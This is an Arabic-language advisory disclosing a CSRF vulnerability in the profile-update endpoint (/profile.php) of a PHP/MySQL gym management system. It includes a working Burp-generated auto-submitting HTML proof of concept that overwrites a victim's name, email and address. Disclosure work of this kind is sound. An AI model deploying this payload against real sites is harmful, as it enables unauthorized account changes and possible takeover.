
نظام إدارة صالة الألعاب الرياضية باستخدام PHP و MYSQL
نظام إدارة صالة رياضية مبني باستخدام PHP وMySQL.
Shoaib Alam - ملف لينكد إن
تم تحديد ثغرة من نوع Cross-Site Request Forgery (CSRF) في نظام إدارة الصالة الرياضية. هذه المشكلة موجودة في وظيفة تحديث الملف الشخصي في لوحة المستخدم.
التطبيق حالياً يفتقر إلى تنفيذ رموز مضادة لـ CSRF، مما يؤدي إلى الثغرة في هجمات Cross-Site Request Forgery (CSRF). هذا الضعف الأمني يؤثر بشكل خاص على نقطة النهاية /profile.php. يمكن للمهاجم استغلال هذا الخلل لتنفيذ تعديلات غير مصرح بها على معلومات المستخدم الحساسة، مثل العنوان والاسم ورقم الهاتف. قد يؤدي هذا إلى المساس بسلامة حسابات المستخدمين ويؤدي إلى مشاكل أمنية أخرى.
نقطة النهاية الضعيفة: /profile.php
فيما يلي إثبات المفهوم الذي يوضح ثغرة CSRF. تم إنشاء هذا PoC باستخدام Burp Suite Professional.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/gym/profile.php" method="POST">
<input type="hidden" name="fname" value="hacked" />
<input type="hidden" name="lname" value="victim" />
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="mobile" value="9999999999" />
<input type="hidden" name="state" value="hacked" />
<input type="hidden" name="city" value="hacked" />
<input type="hidden" name="address" value="hacked" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>